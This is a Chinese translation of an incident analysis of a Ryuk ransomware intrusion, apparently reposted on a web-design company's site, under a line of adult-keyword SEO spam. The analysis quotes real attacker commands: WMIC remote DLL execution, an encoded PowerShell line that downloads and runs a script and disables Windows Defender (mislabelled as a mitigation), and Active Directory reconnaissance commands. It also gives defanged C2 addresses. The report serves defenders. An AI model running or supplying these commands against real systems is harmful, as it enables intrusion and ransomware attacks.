日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Ryuk勒索事件分析

一般勒索軟件都是通過(guò)大規(guī)模垃圾郵件活動(dòng)和漏洞利用工具進(jìn)行傳播,而Ryuk更傾向于一種定制化的攻擊。事實(shí)上,其加密機(jī)制也主要是用于小規(guī)模的行動(dòng)的,比如只加密受感染網(wǎng)絡(luò)中的重要資產(chǎn)和資源。Ryuk勒索病毒最早在2018年8月由國(guó)外某安全公司發(fā)現(xiàn)并報(bào)道,此勒索病毒主要通過(guò)垃圾郵件或漏洞利用工具包進(jìn)行傳播感染。2020年1月至今,工業(yè)企業(yè)的生產(chǎn)網(wǎng)絡(luò)或辦公網(wǎng)絡(luò)遭受數(shù)十起勒索軟件攻擊,其中僅Ryuk勒索軟件就感染了EVRAZ、EMCOR Group、EWA等多家工業(yè)企業(yè),加密企業(yè)關(guān)鍵數(shù)據(jù)信息,導(dǎo)致企業(yè)停工、停產(chǎn),造成重大的經(jīng)濟(jì)損失。2019年,美國(guó)海岸警衛(wèi)隊(duì)(USCG)近日宣布該惡意軟件破壞了美國(guó)的《海上運(yùn)輸安全法》(MTSA)監(jiān)管機(jī)構(gòu)的企業(yè)IT網(wǎng)絡(luò)。根據(jù)USCG表示,攻擊媒介可能是在 MTSA設(shè)施上發(fā)送網(wǎng)絡(luò)釣魚(yú)電子郵件給運(yùn)營(yíng)商 ,一旦員工點(diǎn)擊了電子郵件中的嵌入式惡意鏈接,勒索軟件就加密了受威脅者的重要企業(yè)信息技術(shù)(IT)網(wǎng)絡(luò)信息,從而阻止了工作人員訪問(wèn)該設(shè)施的關(guān)鍵文件。據(jù)了解,Ryuk勒索軟件還感染了美國(guó)某工業(yè)公司的網(wǎng)絡(luò)系統(tǒng),黑客組織對(duì)監(jiān)視系統(tǒng)和貨物轉(zhuǎn)移的操作系統(tǒng)進(jìn)行控制,對(duì)至關(guān)重要的文件加密。

創(chuàng)新互聯(lián)建站主要從事成都網(wǎng)站制作、網(wǎng)站設(shè)計(jì)、外貿(mào)網(wǎng)站建設(shè)、網(wǎng)頁(yè)設(shè)計(jì)、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)德清,十多年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠、服務(wù)專業(yè),歡迎來(lái)電咨詢建站服務(wù):13518219792

如上所述Ryuk過(guò)去幾年來(lái)一直非?;钴S,F(xiàn)BI聲稱截至2020年2月,該組織共獲利了6100萬(wàn)美元。今年年初時(shí)候,該組織變得有點(diǎn)安靜,但過(guò)去幾周發(fā)生了變化,發(fā)生了類似UHS醫(yī)院那樣的事件。今年9月,醫(yī)院遍布美、英的美國(guó)最大連鎖醫(yī)院Universal Health Systems(UHS)遭到勒索軟件攻擊IT系統(tǒng),系統(tǒng)遭癱瘓多時(shí),醫(yī)院也被迫將急診病患轉(zhuǎn)院。目前受影響的醫(yī)院遍及亞利桑納州、加州、喬治亞、賓州、佛州等地。被勒索軟件加密的文件皆有.ryk的文件擴(kuò)展名,而且從黑客留下的勒索消息語(yǔ)法來(lái)判斷,作亂的可能是知名勒索軟件Ryuk。一名安全研究人員指出,這次事件顯示Ryuk在經(jīng)過(guò)幾個(gè)月沉寂后重出江湖。根據(jù)其研究團(tuán)隊(duì)推測(cè),Ryuk可能是經(jīng)由釣魚(yú)信件誘使用戶打開(kāi),而進(jìn)入U(xiǎn)HS的計(jì)算機(jī)系統(tǒng)中。

目前Ryuk組織發(fā)布的勒索軟件可以在29小時(shí)內(nèi)將一封惡意電子郵件發(fā)送到整個(gè)域,并要求超過(guò)600萬(wàn)美元的贖金。攻擊者使用了Cobalt Strike,AdFind,WMI,vsftpd,PowerShell,PowerView和Rubeus等工具來(lái)實(shí)現(xiàn)他們的勒索目標(biāo)。

在這種情況下,攻擊是通過(guò)稱為Bazar/Kegtap的裝載程序惡意軟件開(kāi)始的。研究表明,通過(guò)垃圾郵件發(fā)送的電子郵件在9月份期間一直呈上升趨勢(shì)。

從最初執(zhí)行有效負(fù)載開(kāi)始,Bazar會(huì)注入各種進(jìn)程,包括explorer.exe和svchost.exe以及生成cmd.exe進(jìn)程。這個(gè)活動(dòng)的最初目標(biāo)是運(yùn)行發(fā)現(xiàn)使用內(nèi)置在Windows工具,如nltest, net group,和第三方工具AdFind。

在最初被發(fā)現(xiàn)之后,Bazar惡意軟件保持相對(duì)安靜,直到第二輪攻擊中猜得到充分發(fā)揮。再次,在第二輪發(fā)現(xiàn)中使用了相同的工具,還有Rubeus。這次,發(fā)現(xiàn)攻擊通過(guò)FTP泄漏到俄羅斯托管的服務(wù)器。接下來(lái),攻擊者開(kāi)始橫向移動(dòng)。

從遠(yuǎn)程WMI到使用PowerShell遠(yuǎn)程執(zhí)行服務(wù),都進(jìn)行了幾次嘗試,使用了各種方法,直到最終登陸通過(guò)SMB傳輸?shù)腃obalt Strike beacon可執(zhí)行文件以在環(huán)境中移動(dòng)。這樣,攻擊者依靠在域控制器上運(yùn)行的Cobalt Strike信標(biāo)作為主要操作點(diǎn)。

在選擇了最可靠的方法來(lái)遍歷整個(gè)環(huán)境后,攻擊者隨后在整個(gè)企業(yè)范圍內(nèi)建立了信標(biāo)。為了實(shí)現(xiàn)最終目標(biāo),他們使用PowerShell在環(huán)境中禁用Windows Defender。

首先將域中用于備份的服務(wù)器作為加密目標(biāo),并在主機(jī)上完成一些準(zhǔn)備工作。但是,一旦Ryuk勒索可執(zhí)行文件從其域控制器(DC)pivot通過(guò)SMB傳輸后,只需一分鐘即可執(zhí)行它。

此時(shí),Ryuk已通過(guò)SMB轉(zhuǎn)移到環(huán)境中的其余主機(jī),并通過(guò)來(lái)自pivot域控制器的RDP連接執(zhí)行。從最初執(zhí)行Bazar到覆蓋整個(gè)域,該活動(dòng)總共持續(xù)了29個(gè)小時(shí)。

攻擊者索要了600多個(gè)比特幣,這些比特幣的市場(chǎng)價(jià)值約為600多萬(wàn)美元。

發(fā)現(xiàn)過(guò)程

 要詳細(xì)了解技術(shù)細(xì)節(jié)和攻擊者的戰(zhàn)術(shù)、技術(shù)和程序,請(qǐng)繼續(xù)閱讀“ MITRE ATT&CK”部分。

MITRE ATT&CK

初始訪問(wèn)

最初是通過(guò)帶有Bazar/Kegtap后門(mén)加載器鏈接的電子郵件發(fā)送的,研究人員下載并運(yùn)行了Document-Preview.exe,該文件通過(guò)443/https連接到5.182.210[.]145。

執(zhí)行

在橫向移動(dòng)過(guò)程中,多次使用服務(wù)執(zhí)行來(lái)執(zhí)行腳本和可執(zhí)行文件。

 在嘗試橫向執(zhí)行dll時(shí)也使用了WMI。

 
 
 
 
    
  
  
  
  
  1. WMIC /node:"DC.example.domain" process call create "rundll32 C:\PerfLogs\arti64.dll, StartW" 
    2.

攻擊者還執(zhí)行了進(jìn)程注入。

 緩解措施

禁用Windows Defender

 
 
 
 
    
  
  
  
  
  1. powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgA3ADgAMAAxAC8AJwApADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAJAB0AHIAdQBlAA== 
    2.

檢測(cè)過(guò)程

第一天的檢測(cè)過(guò)程

在執(zhí)行Document-Preview.exe后幾分鐘,AdFind和adf.bat被刪除并運(yùn)行了幾分鐘。我們已經(jīng)看過(guò)adf.bat多次,你可以在此處了解更多信息。批處理文件將信息輸出到以下文本文件中。

 Nltest用于檢查域信任。

 
 
 
 
    
  
  
  
  
  1. nltest /domain_trusts /all_trusts 
    2.

Net用來(lái)顯示域管理員。

 
 
 
 
    
  
  
  
  
  1. net group "Domain admins" /DOMAIN 
    2.

Ping用于測(cè)試系統(tǒng)是否在環(huán)境中正常運(yùn)行。

 
 
 
 
    
  
  
  
  
  1. ping hostname.domain.local 
    2.

在第1天從Bazar加載器中分解活動(dòng)的流程樹(shù)。

 第二天的檢測(cè)過(guò)程

Afind再次運(yùn)行,然后攻擊者嘗試使用Rubeus攻擊Kerberoast。

 在橫向運(yùn)動(dòng)失敗期間幾次誤啟動(dòng)之后,攻擊者執(zhí)行了一些其他的本地系統(tǒng)檢測(cè)。

 
 
 
 
    
  
  
  
  
  1. systeminfo 
    2.   
  
  
  
  2.  
    3.   
  
  
  
  3. nltest /dclist: 
    4.   
  
  
  
  4.  
    5.   
  
  
  
  5. Get-NetSubnet 
    6.   
  
  
  
  6.  
    7.   
  
  
  
  7. Get-NetComputer -operatingsystem *server* 
    8.   
  
  
  
  8.  
    9.   
  
  
  
  9. Invoke-CheckLocalAdminAccess 
    10.   
  
  
  
  10.  
    11.   
  
  
  
  11. Find-LocalAdminAccess 
    12.

使用WMI在許多系統(tǒng)上檢查當(dāng)前的AntiVirus。

 
 
 
 
    
  
  
  
  
  1. WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 
    2.  
 
 
 
 
 
 
 
    
  
  
  
  
  1. Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8 
    2.

橫向運(yùn)動(dòng)

在第一天,攻擊者在繼續(xù)進(jìn)行更多發(fā)現(xiàn)之前檢查了MS17-010的域控制器。該系統(tǒng)不容易受到MS17-010攻擊。

橫向移動(dòng)在最初進(jìn)入后28小時(shí)左右開(kāi)始,使用SMB在域控制器上放置了Cobalt Strike Beacon。這樣攻擊者就可以使用WMIC執(zhí)行信標(biāo)。

 
 
 
 
    
  
  
  
  
  1. WMIC /node:\"DC.example.domain\" process call create \"rundll32 C:\\PerfLogs\\arti64.dll, StartW\" 
    2.

該攻擊似乎沒(méi)有成功運(yùn)行,因?yàn)楣粽咴跊](méi)有明顯的命令和控制流量后不久就在beachhead主機(jī)上釋放了一個(gè)額外的載荷,然后在DC上執(zhí)行了一項(xiàng)服務(wù)。

 解碼后的Powershell。

 此后,攻擊者復(fù)制并執(zhí)行了Cobalt Strike信標(biāo)可執(zhí)行文件,并通過(guò)域控制器上的服務(wù)將其啟動(dòng)。

 此時(shí),C2連接出現(xiàn)在域控制器上,該控制器通過(guò)443/https連接到martahzz[.]com – 88.119.171[.]75。

在從beachhead主機(jī)執(zhí)行第一次橫向移動(dòng)之后大約一小時(shí)執(zhí)行一次,使用SMB exe執(zhí)行備用系統(tǒng)的橫向移動(dòng)。

攻擊者在許多系統(tǒng)上運(yùn)行信標(biāo)時(shí)遇到問(wèn)題,并且在至少一個(gè)系統(tǒng)上,他們遠(yuǎn)程安裝了驅(qū)動(dòng)器。

 
 
 
 
    
  
  
  
  
  1. C:\Windows\system32\cmd.exe /C dir \\Server\c$ 
    2.

命令與控制

 漏洞

vsftpd將域發(fā)現(xiàn)(AdFind和Rubeus輸出)擴(kuò)展為45.141.84[.]120。

 惡意影響

SMB用于傳輸Ryuk可執(zhí)行文件,然后,從第一個(gè)被破壞的DC建立RDP連接,然后從備份服務(wù)器開(kāi)始在整個(gè)環(huán)境中執(zhí)行勒索軟件。在執(zhí)行備份之前,攻擊者在備份服務(wù)器上啟動(dòng)了wbadmin msc控制臺(tái)。

在勒索執(zhí)行之前先執(zhí)行命令:

 所有系統(tǒng)都留下了以下贖金說(shuō)明:

 攻擊者要求提供超過(guò)600萬(wàn)美元,但愿意進(jìn)行談判。

針對(duì)Ryuk的一系列攻擊事件,你可以采取以下緩解措施

完善入侵檢測(cè)和入侵防御系統(tǒng);

可監(jiān)控實(shí)時(shí)網(wǎng)絡(luò)流量行業(yè)標(biāo)準(zhǔn)和最新的病毒檢測(cè)軟件;

集中分析那些受監(jiān)控的主機(jī)和服務(wù)器日志記錄;

對(duì)網(wǎng)絡(luò)分段以防止IT系統(tǒng)訪問(wèn)運(yùn)營(yíng)技術(shù)(OT)環(huán)境;

最新的IT/OT網(wǎng)絡(luò)圖;

所有關(guān)鍵文件和軟件的一致備份;

本文翻譯自:https://thedfirreport.com/2020/10/08/ryuks-return/如若轉(zhuǎn)載,請(qǐng)注明原文地址。


標(biāo)題名稱:Ryuk勒索事件分析
當(dāng)前路徑:http://www.dlmjj.cn/article/cdoijij.html